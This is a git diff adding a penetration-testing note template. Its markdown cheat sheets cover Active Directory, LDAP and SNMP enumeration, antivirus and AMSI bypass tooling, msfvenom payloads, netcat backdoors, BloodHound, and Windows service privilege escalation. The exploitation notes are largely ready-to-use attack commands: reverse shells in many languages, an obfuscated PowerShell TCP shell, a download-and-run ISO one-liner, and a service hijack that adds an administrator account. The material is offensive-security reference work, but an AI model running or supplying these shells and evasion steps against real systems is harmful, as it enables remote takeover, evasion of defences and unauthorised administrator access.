+# Note: Be careful with brute forcing AD as you can disable user accounts due to the Account Lockout Policy.
+
+
+# Anonymous Credential LDAP Dumping:
+
+- ldapsearch -LLL -x -H ldap:// -b ‘’ -s base ‘(objectclass=*)’
+
+Impacket GetADUsers.py (Must have valid credentials)
+
+- GetADUsers.py -all -dc-ip
+
+Impacket lookupsid.py:
+
+- /usr/share/doc/python3-impacket/examples/lookupsid.py username:password@172.21.0.0
+
+Impacket Secretdump:
+
+python3 secretdump.py 'breakme.local/Administrator@172.21.0.0' -just-dc-user anakin
+
+Windapsearch:
+
+https://github.com/ropnop/windapsearch
+
+- python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U
+
+Crackmapexec:
+
+- cme ldap -u "" -p "" -d
+
+- cme ldap -u "Guest" -p "" -d
+
+## References:
+
+- PayloadAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise
+
+- Attacking Active Directory: 0 to 0.9:
+https://zer1t0.gitlab.io/posts/attacking_ad/
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/4. SNMP/General Notes.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/4. SNMP/General Notes.md
new file mode 100644
index 0000000..2e1767e
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/4. SNMP/General Notes.md
@@ -0,0 +1,55 @@
+## SNMP Walk:
+
+
+- snmpwalk -c public -v1 ipaddress 1
+- snmpwalk -c private -v1 ipaddress 1
+- snmpwalk -c manager -v1 ipaddress 1
+
+
+## Nmap Enumeration:
+
+- nmap 172.21.0.0 -Pn -sU -p 161 --script=
+
+/usr/share/nmap/scripts/snmp-brute.nse
+/usr/share/nmap/scripts/snmp-hh3c-logins.nse
+/usr/share/nmap/scripts/snmp-info.nse
+/usr/share/nmap/scripts/snmp-interfaces.nse
+/usr/share/nmap/scripts/snmp-ios-config.nse
+/usr/share/nmap/scripts/snmp-netstat.nse
+/usr/share/nmap/scripts/snmp-processes.nse
+/usr/share/nmap/scripts/snmp-sysdescr.nse
+/usr/share/nmap/scripts/snmp-win32-services.nse
+/usr/share/nmap/scripts/snmp-win32-shares.nse
+/usr/share/nmap/scripts/snmp-win32-software.nse
+/usr/share/nmap/scripts/snmp-win32-users.nse
+
+## Metasploit auxilary modules:
+
+ auxiliary/scanner/misc/oki_scanner
+ auxiliary/scanner/snmp/aix_version
+ auxiliary/scanner/snmp/arris_dg950
+ auxiliary/scanner/snmp/brocade_enumhash
+ auxiliary/scanner/snmp/cisco_config_tftp
+ auxiliary/scanner/snmp/cisco_upload_file
+ auxiliary/scanner/snmp/cnpilot_r_snmp_loot
+ auxiliary/scanner/snmp/epmp1000_snmp_loot
+ auxiliary/scanner/snmp/netopia_enum
+ auxiliary/scanner/snmp/sbg6580_enum
+ auxiliary/scanner/snmp/snmp_enum
+ auxiliary/scanner/snmp/snmp_enum_hp_laserjet
+ auxiliary/scanner/snmp/snmp_enumshares
+ auxiliary/scanner/snmp/snmp_enumusers
+ auxiliary/scanner/snmp/snmp_login
+
+
+Onesixtyone:
+
+- onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 172.21.0.X
+
+Snmp-check
+
+- snmp-check 172.21.0.0 -c public
+
+Impacket:
+
+- python3 samdump.py SNMP 172.21.0.0
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/8. Other Services/LDAP Enumeration (Port 389).md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/8. Other Services/LDAP Enumeration (Port 389).md
new file mode 100644
index 0000000..4811446
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/8. Other Services/LDAP Enumeration (Port 389).md
@@ -0,0 +1,80 @@
+# LDAP Enumeration Tools
+
+**Note:** Be careful with brute forcing AD as you can disable user accounts due to the Account Lockout Policy.
+
+### ldapsearch
+
+Simple authentication check:
+```
+$ ldapsearch -h -x
+```
+Anonymous Credential LDAP Dumping:
+```
+$ ldapsearch -LLL -x -H ldap:// -b ‘’ -s base ‘(objectclass=*)’
+```
+Getting DN:
+```
+$ ldapsearch -h -x -s base namingcontexts
+```
+- `-s` is scope: one of base, one, sub or children (search scope)
+
+If you get DN from above command, use it in a base search (-b basedn: base dn for search)
+```
+$ ldapsearch -h -x -b "DC=,DC="
+```
+You can also query the LDAP server:
+```
+$ ldapsearch -h -x -b "DC=,DC="
+```
+i.e. user enumeration:
+```
+$ ldapsearch -h -x -b "DC=,DC=" '(objectClass=Person)'
+```
+This will give a lot of useful information, i.e. when password was last reset, username of the account (sAMAccountName).
+
+Filtering your query:
+```
+$ ldapsearch -h -x -b "DC=,DC=" '(objectClass=Person)'
+```
+I.e. to query for only account names:
+```
+$ ldapsearch -h -x -b "DC=,DC=" '(objectClass=Person)' sAMAccountName
+```
+Or use grep to get a list of account names for password spraying:
+```
+$ ldapsearch -h -x -b "DC=,DC=" '(objectClass=Person)' sAMAccountName | grep sAMAccountName | awk '{print $2}' > userlist.ldap
+```
+
+### Impacket
+
+Using that username list generated from `ldapsearch`, we can use Impacket's `GetNPUsers.py` to see if we can get a user's TGT:
+```
+$ python3 GetNPUsers.py -dc-ip -request domain.local/ -userfile userlist.ldap -format john
+```
+or
+```
+$ GetADUsers.py -all -dc-ip
+```
+
+You can simply change the -format flag to hashcat if you want to use hashcat.
+
+Or try with no password:
+```
+$ python3 GetNPUsers.py -request -no-pass -dc-ip
+```
+
+Impacket `lookupsid.py`:
+```
+$ /usr/share/doc/python3-impacket/examples/lookupsid.py username:password@x.x.x.x
+```
+
+### Windapsearch
+
+Source: https://github.com/ropnop/windapsearch
+```
+$ python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U
+```
+
+#### References:
+
+- [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise)
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/4. Enumerating Targets/Target _1.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/4. Enumerating Targets/Target _1.md
new file mode 100644
index 0000000..4159f8f
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/4. Enumerating Targets/Target _1.md
@@ -0,0 +1 @@
+# This is a placeholder to contain all notes regarding the enumeration phase for each target you assess.
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Bypass Windows Amsi.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Bypass Windows Amsi.md
new file mode 100644
index 0000000..741d9b1
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Bypass Windows Amsi.md
@@ -0,0 +1,15 @@
+## Testing for Amsi Bypass:
+
+- https://github.com/rasta-mouse/AmsiScanBufferBypass
+
+## Amsi-Bypass-Powershell
+
+- https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
+
+## Resources:
+
+- https://blog.f-secure.com/hunting-for-amsi-bypasses/
+- https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
+- https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
+- https://slaeryan.github.io/posts/falcon-zero-alpha.html
+- https://www.hackingarticles.in/a-detailed-guide-on-amsi-bypass/
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Bypassing AV.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Bypassing AV.md
new file mode 100644
index 0000000..bfa78b8
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Bypassing AV.md
@@ -0,0 +1,61 @@
+## Veil Framework:
+
+Install on Kali:
+- apt install veil
+- /usr/share/veil/config/setup.sh --force --silent
+
+Reference: https://github.com/Veil-Framework/Veil
+
+## Shellter
+
+Source: https://www.shellterproject.com/download/
+
+- apt install shellter
+
+
+## Sharpshooter
+
+Javascript Payload Stageless:
+- SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
+
+Stageless HTA Payload:
+
+- SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
+
+Staged VBS:
+
+- SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
+
+Reference: https://github.com/mdsecactivebreach/SharpShooter
+
+## Donut:
+
+Source: https://github.com/TheWover/donut
+
+## Vulcan
+
+Source: https://github.com/praetorian-code/vulcan
+
+
+## Scarecrow
+
+Source: https://github.com/optiv/ScareCrow
+
+In Kali:
+
+sudo apt install golang
+
+go get github.com/fatih/color
+go get github.com/yeka/zip
+go get github.com/josephspurrier/goversioninfo
+
+go build ScareCrow.go
+
+./ScareCrow
+
+# Resources:
+
+- https://book.hacktricks.xyz/windows-hardening/av-bypass
+- https://www.ired.team/offensive-security/defense-evasion/av-bypass-with-metasploit-templates
+-
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/General Notes.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/General Notes.md
new file mode 100644
index 0000000..5c3f342
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/General Notes.md
@@ -0,0 +1,128 @@ +## Pre-requisites for runninging exploits + +- Check the version of the operating system. +- Check the software version. +- Check if there is exploit for it (Searchsploit, ExploitDB, Google, etc). +- If you have an exploit, is there a Metasploit Module for it? + + +## Default Credentials + +- https://cirt.net/passwords +- https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials + +## Reverse Shells + +## Online Reverse Shell Generators: +- https://www.revshells.com/ +- https://shellgenerator.github.io/ + +## Hosting Revshells Locally: +1. git clone https://github.com/0dayCTF/reverse-shell-generator +2. docker build -t reverse_shell_generator . +3. docker run -d -p 80:80 reverse_shell_generator + +## Other Reverse Shell: + +Bash: + +- bash -i >& /dev/tcp/IP ADDRESS/8080 0>&1 + +Perl: + +``` +perl -e 'use Socket;$i="IP ADDRESS";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' +``` + +Python: + +- python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP ADDRESS",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' + +IPv6: + +- python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' + +Ruby: + +- ruby -rsocket -e'f=TCPSocket.open("IP ADDRESS",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' +- ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' + + +PHP: + +Pentest Monkey Reverse Shell for PHP: +In Kali: + +/usr/share/webshells/php/php-reverse-shell.php + +Link: http://pentestmonkey.net/tools/web-shells/php-reverse-shell + +- 
php -r '$sock=fsockopen("IP ADDRESS",1234);exec("/bin/sh -i <&3 >&3 2>&3");' + +Windows Powershell Oneliner: + +Note: To change the IP Address replace the number values in Check.for.Callback.Connection. To change the port pick your own numeric values to equal the number you want your shell to callback to you. + +``` +# Offsec-callback-v2 +$ezYSZf = & ((Get-Command "New-ScheduledJobOption").name[0,1,2,3,14,15,13,1,5,18] -join '') ([string]::join('', ( (83,121,115,116,101,109,46,78,101,116,46,83,111,99,107,101,116,115,46,84,67,80,67,108,105,101,110,116) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})("Check.for.Callback.Connection".Replace("Check",127).Replace("For",0+255-255).Replace("Callback", 0+234-234).Replace("Connection",0+0+0+1),(443*2-443)); +$VXm = $ezYSZf.GetStream(); +# checkin to target +[byte[]]$0bLXRjHKPvWQUhq = (10023-10023)..(13107*5)|<##>%{$_}<##>|%{0}; +while(($i = $VXm.Read($0bLXRjHKPvWQUhq, 0, $0bLXRjHKPvWQUhq.Length)) -ne 0) +{; +$Tc9dYRLI5 = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($0bLXRjHKPvWQUhq,0, $i); +$sendback = (iex $Tc9dYRLI5 2>&1 |<##>%{$_}<##>| Out-String ); +# AND +$YzlnHIRT = $sendback + $(([string]::join('', ( (80,83,32) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})) + (pwd).Path + $(([string]::join('', ( (62,62,32) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})); +$sdfghjklASDA222 = ([text.encoding]::ASCII).GetBytes($YzlnHIRT); +$VXm.Write($sdfghjklASDA222,0,$sdfghjklASDA222.Length);$VXm.Flush() +}; +Start-Sleep -Seconds 5 +# checkout of target +$ezYSZf.Close() +``` + +Powershell ISO Oneliner: +``` +powershell -c "(New-Object System.Net.WebClient).DownloadFile('https://172.21.1.0/windows.iso', 'C:\Windows\Tasks\windows.iso'); $MountedImage = Mount-DiskImage -ImagePath 'C:\Windows\Tasks\windows.iso' -PassThru; Start-Process -FilePath ($MountedImage | Get-Volume).DriveLetter + ':\msupdate.exe'; dismount-DiskImage -ImagePath $MountedImage.ImagePath" +``` + +Linux 
Powershell Oneliner: + +``` +$ezYSZf = & (("New-ScheduledJobOption")[0,1,2,3,14,15,13,1,5,18] -join '') ([string]::join('', ( (83,121,115,116,101,109,46,78,101,116,46,83,111,99,107,101,116,115,46,84,67,80,67,108,105,101,110,116) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})("Stay.Off.Ronins.Lawn".Replace("Stay",127).Replace("Off",0+255-255).Replace("Ronins", 0+1-1).Replace("Lawn",0+0+0+1),(443*2-443)); +$VXm = $ezYSZf.GetStream(); +[byte[]]$0bLXRjHKPvWQUhq = (10023-10023)..(13107*5)|<##>%{$_}<##>|%{0}; +while(($i = $VXm.Read($0bLXRjHKPvWQUhq, 0, $0bLXRjHKPvWQUhq.Length)) -ne 0) +{; +$Tc9dYRLI5 = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($0bLXRjHKPvWQUhq,0, $i); +$sendback = (iex $Tc9dYRLI5 2>&1 |<##>%{$_}<##>| Out-String ); +$YzlnHIRT = $sendback + $(([string]::join('', ( (80,83,32) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})) + (pwd).Path + $(([string]::join('', ( (62,62,32) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})); +$sdfghjklASDA222 = ([text.encoding]::ASCII).GetBytes($YzlnHIRT); +$VXm.Write($sdfghjklASDA222,0,$sdfghjklASDA222.Length);$VXm.Flush() +}; +$ezYSZf.Close() +``` + +Golang: + +- echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","IP ADDRESS:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go + +AWK: + +- awk 'BEGIN {s = "/inet/tcp/0/IP ADDRESS/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null + + +Other Reverse Shell: +https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + + +## Other Resources + +- Amsi-Bypass-Powershell: https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell + + + + + 
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Msfvenom.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Msfvenom.md
new file mode 100644
index 0000000..f758318
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Msfvenom.md
@@ -0,0 +1,86 @@
+## Creating a payload
+
+- msfvenom -p [payload] LHOST=[listeninghost] LPORT=[listeningport]
+
+To view list of payloads: msfvenom -l payloads
+To view the payload options: msfvenom -p windows/x64/meterpreter_reverse_tcp --list-options
+
+## Creating a payload with encoding
+
+- msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] > outputfile
+
+## Creating a payload using a template
+
+- msfvenom -p [payload] -x [template] -f [formattype] > outputfile
+
+## Listening for MSfvenom Payloads:
+
+```
+msf5>use exploit/multi/handler
+msf5>set payload windows/meterpreter/reverse_tcp
+msf5>set lhost
+msf5>set lport
+msf5> set ExitOnSession false
+msf5>exploit -j
+```
+
+## Windows Payloads
+
+- msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
+- msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe
+- msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe
+- msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
+- msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
+
+## Linux Payloads
+
+- msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
+- msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
+- msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
+- msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
+
+Add a user in windows with msfvenom:
+
+- msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe
+
+## Web Payloads
+
+PHP
+
+- msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
+cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
+
+ASP
+
+- msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
+
+JSP
+
+- msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
+
+WAR
+
+- msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
+
+## Scripting Payloads
+
+Python
+
+- msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
+
+Bash
+
+- msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
+
+Perl
+
+- msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
+
+
+Creating an Msfvenom Payload with an encoder while removing bad charecters:
+
+- msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x0A\x0D"
+
+## Resources:
+
+- https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Netcat Tips.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Netcat Tips.md
new file mode 100644
index 0000000..93a442b
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Netcat Tips.md
@@ -0,0 +1,28 @@
+## Fundamentals:
+
+Connect to a netcat client:
+- rlwrap nc [IP Address] [port]
+
+Connect to a netcat Listener:
+
+- rlwrap nc -lvp [Localport]
+
+More info on rlwrap: https://linux.die.net/man/1/rlwrap
+
+## Backdoor Shells:
+
+Linux:
+
+- rlwrap nc [Your IP Address] -e /bin/sh
+- rlwrap nc [Your IP Address] -e /bin/bash
+- rlwrap nc [Your IP Address] -e /bin/zsh
+- rlwrap nc [Your IP Address] -e /bin/ash
+
+
+Windows:
+
+- rlwrap nc -lv [localport] -e cmd.exe
+
+Linux netcat reverse shell:
+
+- rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.21.0.0 1234 >/tmp/f
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Searchsploit.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Searchsploit.md
new file mode 100644
index 0000000..7dd2010
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Searchsploit.md
@@ -0,0 +1,39 @@
+## Installing searchsploit (Already in Kali)
+
+- apt update && apt install exploitdb
+
+## Install binsploits
+Note: bin-sploits contains a set of compiled binaries that are tied to exploits in the exploitdb database. Installing this package will take some time depending on your network connection.
+
+- apt update && apt install exploitdb-bin-sploits
+
+## updating searchsploit
+
+- searchsploit -u
+
+## Basic Searching:
+
+- searchsploit etc
+- searchsploit -t php windows
+
+## Exclude unwanted results
+- searchsploit linux kernel 5.2 --exclude="Poc"
+
+## View exploits from Searchsploit
+- searchsploit 9542 --examine
+- searchsploit -x window/remote/42031.py
+
+
+## Copy exploit to current working directory
+- searchsploit -m
+
+## Access Exploits from Exploit-DB website:
+- searchsploit vsftpd 2.3.4 -w
+
+## Run an nmap scan result through searchsploit:
+1. Nmap -Pn 172.21.0.0 -oX results.xml
+2. searchsploit -x --nmap results.xml
+
+Referneces:
+
+- https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Transferring Files.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Transferring Files.md
new file mode 100644
index 0000000..2993d3f
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Transferring Files.md
@@ -0,0 +1,55 @@
+# Services to Host Files on your System:
+
+General Options:
+
+FTP:
+
+Install pyftpdlib
+- pip3 install pyftpdlib
+
+Pure-ftpd
+- sudo apt install pure-ftpd
+- service pure-ftpd start
+
+Run (-w flag allows anonymous write access)
+- Python3 -m pyftpdlib -p 21 -w
+
+Web:
+
+- Python3 -m http.server 443
+- service apache2 start
+
+Powershell:
+
+Raw (Will get flagged by AV/AMSI):
+
+- powershell -c (New-Object Net.WebClient).DownloadFile('http://172.21.0.0:port/file', 'output-file'
+- powershell -c Invoke-WebRequest -Uri "http://172.21.0.0" -OutFile "C:\path\file"
+
+
+Use Powercat:
+
+Send File:
+ powercat -c 10.1.1.1 -p 443 -i C:\inputfile
+Recieve File:
+ powercat -l -p 8000 -of C:\inputfile
+
+Linux:
+
+scp:
+
+- scp [OPTION] [user@]SRC_HOST:]file1 [user@]DEST_HOST:]file2
+
+scp through ssh:
+
+- scp -P 2322 passwords.txt remote_username@172.21.0.2:/remote/directory
+
+scp remote file to local system:
+
+- scp remote_username@172.21.0.2:/remote/file.txt /local/directory
+
+
+# Services to allow you to upload files to your system from the target:
+
+- SimpleHTTPServer Upload: https://gist.github.com/touilleMan/eb02ea40b93e52604938
+
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Villian Cheatsheet.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Villian Cheatsheet.md
new file mode 100644
index 0000000..a8c24c6
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Villian Cheatsheet.md
@@ -0,0 +1,23 @@
+# Installation:
+sudo apt update&&sudo apt install gnome-terminal
+git clone https://github.com/t3l3machus/Villain
+cd ./Villain
+pip3 install -r requirements.txt
+
+# Generating Payloads
+
+## Main Logic:
+
+```
+generate payload= lhost= [ obfuscate encode ]
+```
+
+-
+
+## Session Defender
+Villain has a function that inspects user issued shell commands for input that may cause a backdoor shell session to hang (e.g., unclosed single/double quotes or backticks, commands that may start a new interactive session within the current shell and more). Use the `cmdinspector` command to turn that feature on/off.
+
+Usage:
+```
+cmdinspector
+```
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/6. Exploitation Targets_/Target _1.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/6. Exploitation Targets_/Target _1.md
new file mode 100644
index 0000000..2ab5ecc
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/6. Exploitation Targets_/Target _1.md
@@ -0,0 +1 @@
+# This is a placeholder to contain all notes regarding the exploitation phase for each target you assess.
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/BloodHound.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/BloodHound.md
new file mode 100644
index 0000000..a3257bc
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/BloodHound.md
@@ -0,0 +1,63 @@
+# BloodHound
+
+###Source:
+
+- https://github.com/BloodHoundAD/BloodHound
+
+## In Kali:
+```
+$ sudo apt install bloodhound
+$ bloodhound
+```
+## Installing:
+```
+$ cd /opt
+$ sudo git clone https://github.com/BloodHoundAD/BloodHound.git
+$ sudo wget https://github.com/BloodHoundAD/BloodHound/releases/download/3.0.3/BloodHound-linux-x64.zip
+```
+
+Neo4j has to be running for Bloodhound web app to work:
+```
+$ sudo neo4j console
+```
+Set the password if you haven't already.
+
+Start bloodhound:
+```
+$ sudo ./Bloodhound --no-sandbox
+```
+
+## Pre-Compiled Binaries
+
+- https://github.com/BloodHoundAD/BloodHound/releases
+
+## SharpHound:
+
+- https://github.com/BloodHoundAD/SharpHound3
+
+Execute on target:
+```
+C:\> .\SharpHound.exe -c all
+```
+or in Powershell with .ps1 version
+
+```
+C:\> import-module .\sharphound.ps1
+C:\> invoke-bloodHound -CollectionMethod all -domain -LDAPUser -LDAPPass
+```
+Note: `-domain`, `-LDAPUser`, and `-LDAPPass` are optional and bloodhound will run with only the `-CollectionMethod` flag.
+
+Other useful sharphound flags:
+- `--encryptzip`: allows you to encrypt the file using a random password
+- `--zipfilename`: allows you to name the outputted filename so that "bloodhound" isn't in the name in case AV catches it.
+
+If you want to run SharpHound from a PC that is not joined to the target domain, open a command prompt and run:
+```
+C:\> runas /netonly /user:DOMAIN\USER powershell.exe
+```
+Then run the PS commands listed above as the domain user in the PowerShell context.
+
+### Bloodhound for python
+Note: Only compatiable with BloodHound 3.0 or newer
+
+https://github.com/fox-it/BloodHound.py
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Editable Services/General Notes.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Editable Services/General Notes.md
new file mode 100644
index 0000000..091ca71
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Editable Services/General Notes.md
@@ -0,0 +1,27 @@
+# Editable Service
+
+If you find a service that is editable (WinPEAS can help here to find such services) you can edit the binpath to point to nc.exe to get a reverse shell.
+
+Steps also described here: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#example-with-windows-10---cve-2019-1322-usosvc
+
+Note: in both my experiences using this, this does get shell, but it closes in a few seconds.
+
+ 1. Upload `nc.exe` to a writable directory.
+ 2. `sc config usosvc binpath= "C:\Inetpub\wwwroot\nc.exe -nv 9988 -e C:\Windows\System32\cmd.exe"`
+ 3. `sc config usosvc obj= ".\LocalSystem" password= ""`
+ - I didn't need this second time using it
+ 5. `sc config usosvc start= "demand"`
+ 6. `nc -lvp 9988` (setup listener on kali)
+ 7. `net start usosvc`
+ 8. R00T!
+
+Since shell closes soon, add new admin user:
+1. `net user hacker h@ck3r%93 /add`
+2. `net localgroup administrators hacker /add`
+
+Now RDP/ssh with new creds (if services are available, or you can open them yourself):
+1. `rdesktop `
+2. R00T!
+
+The shell closes due to a Windows timeout variable in the registry that defines how long to wait for a service to response. If you're in a position to edit that (i.e. ssh/rdp not enabled) this would stabilize the shell.
+If you don’t want to edit the registry, since you're admin for a bit with this shell, you could try enabling RDP or SSH.
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Files on the System/General Notes Linux.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Files on the System/General Notes Linux.md
new file mode 100644
index 0000000..7bd19b0
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Files on the System/General Notes Linux.md
@@ -0,0 +1,78 @@
+## Finding Sensitive files on Linux:
+
+```
+locate password | more
